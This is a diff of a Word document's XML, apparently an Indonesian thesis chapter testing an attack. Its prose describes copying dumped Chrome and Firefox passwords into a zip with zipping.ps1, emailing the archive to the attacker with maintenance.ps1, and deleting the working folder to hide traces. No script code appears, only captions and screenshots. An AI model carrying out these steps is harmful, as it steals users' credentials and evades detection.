+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="124" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="124"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -35608,6 +32666,7 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">.zip. hal ini dilakukan dengan cara menyalin ChromePass.txt dan PasswordFox.txt kedalam folder Password kemudian menjalankan </w:t>
       </w:r>
       <w:r>
@@ -35650,7 +32709,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2404FAEE" wp14:editId="0C333D41">
             <wp:extent cx="4579952" cy="2404215"/>
@@ -35667,7 +32725,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId31"/>
+                    <a:blip r:embed="rId33"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -35699,7 +32757,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="124" w:name="_Toc43194862"/>
+      <w:bookmarkStart w:id="125" w:name="_Toc43194862"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -35734,7 +32792,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>13</w:t>
+        <w:t>15</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -35769,7 +32827,7 @@
         </w:rPr>
         <w:t>.txt</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="124"/>
+      <w:bookmarkEnd w:id="125"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -35895,7 +32953,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId32"/>
+                    <a:blip r:embed="rId34"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -35927,7 +32985,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="125" w:name="_Toc43194863"/>
+      <w:bookmarkStart w:id="126" w:name="_Toc43194863"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -35962,7 +33020,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>14</w:t>
+        <w:t>16</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -35979,7 +33037,7 @@
         </w:rPr>
         <w:t>. Baris Perintah Menjalankan zipping.ps1</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="125"/>
+      <w:bookmarkEnd w:id="126"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -36004,6 +33062,7 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
         <w:t xml:space="preserve">Pada Gambar V-13 berikut ditampilkan </w:t>
       </w:r>
@@ -36047,7 +33106,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41490BD6" wp14:editId="2FFAF2BF">
             <wp:extent cx="4420926" cy="2394807"/>
@@ -36064,7 +33122,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId33"/>
+                    <a:blip r:embed="rId35"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -36102,7 +33160,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="126" w:name="_Toc43194864"/>
+      <w:bookmarkStart w:id="127" w:name="_Toc43194864"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -36137,7 +33195,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>15</w:t>
+        <w:t>17</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -36172,7 +33230,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Password.zip Berhasil Dibuat</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="126"/>
+      <w:bookmarkEnd w:id="127"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -36199,15 +33257,7 @@
           <w:bCs/>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">Pengujian </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Mengirim </w:t>
+        <w:t xml:space="preserve">Pengujian Mengirim </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -36296,390 +33346,6 @@
             <wp:extent cx="4615398" cy="2425148"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="48" name="Picture 48"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId34"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4649317" cy="2442970"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
-        <w:ind w:left="720" w:firstLine="720"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="127" w:name="_Toc43194865"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Gambar V- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>16</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>. Baris Perintah Menjalankan maintenance.ps1</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="127"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Pada gambar diatas dapat dilihat </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">script </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">berhasil dijalankan, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>email</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> yang berhasil dikirimkan akan diterima oleh penyerang seperti yang ditampilkan pada Gambr V-15 berikut.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:keepNext/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64309F2D" wp14:editId="7F0B2FF2">
-            <wp:extent cx="4572000" cy="2169079"/>
-            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
-            <wp:docPr id="49" name="Picture 49"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId35"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4584882" cy="2175191"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Caption"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="128" w:name="_Toc43194866"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Gambar V- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>17</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Email</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Berhasil Dikirimkan</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="128"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="34"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709" w:firstLine="0"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Pengujian Menghapus Folder</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Langkah terakhir dari rangkaian penyerangan yang dilakukan adalah dengan menghapus folder chrome dari direktori C: komputer target sehingga tidak meninggalkan jejak penyerangan yang mencurigakan. Pada Gambar IV-16 berikut ditampilkan baris perintah untuk megakhiri penyerangan.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:keepNext/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="709"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="404335DF" wp14:editId="187BF004">
-            <wp:extent cx="4595854" cy="2414879"/>
-            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
-            <wp:docPr id="50" name="Picture 50"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -36699,6 +33365,390 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="4649317" cy="2442970"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:left="720" w:firstLine="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="128" w:name="_Toc43194865"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>18</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>. Baris Perintah Menjalankan maintenance.ps1</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="128"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Pada gambar diatas dapat dilihat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">berhasil dijalankan, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> yang berhasil dikirimkan akan diterima oleh penyerang seperti yang ditampilkan pada Gambr V-15 berikut.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64309F2D" wp14:editId="7F0B2FF2">
+            <wp:extent cx="4572000" cy="2169079"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:docPr id="49" name="Picture 49"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId37"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4584882" cy="2175191"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="129" w:name="_Toc43194866"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>19</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Berhasil Dikirimkan</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="129"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709" w:firstLine="0"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Pengujian Menghapus Folder</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Langkah terakhir dari rangkaian penyerangan yang dilakukan adalah dengan menghapus folder chrome dari direktori C: komputer target sehingga tidak meninggalkan jejak penyerangan yang mencurigakan. Pada Gambar IV-16 berikut ditampilkan baris perintah untuk megakhiri penyerangan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="404335DF" wp14:editId="187BF004">
+            <wp:extent cx="4595854" cy="2414879"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="50" name="Picture 50"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId38"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="4621254" cy="2428225"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -36723,7 +33773,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="129" w:name="_Toc43194867"/>
+      <w:bookmarkStart w:id="130" w:name="_Toc43194867"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -36758,7 +33808,7 @@
           <w:bCs w:val="0"/>
           <w:noProof/>
         </w:rPr>
-        <w:t>18</w:t>
+        <w:t>20</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -36775,7 +33825,7 @@
         </w:rPr>
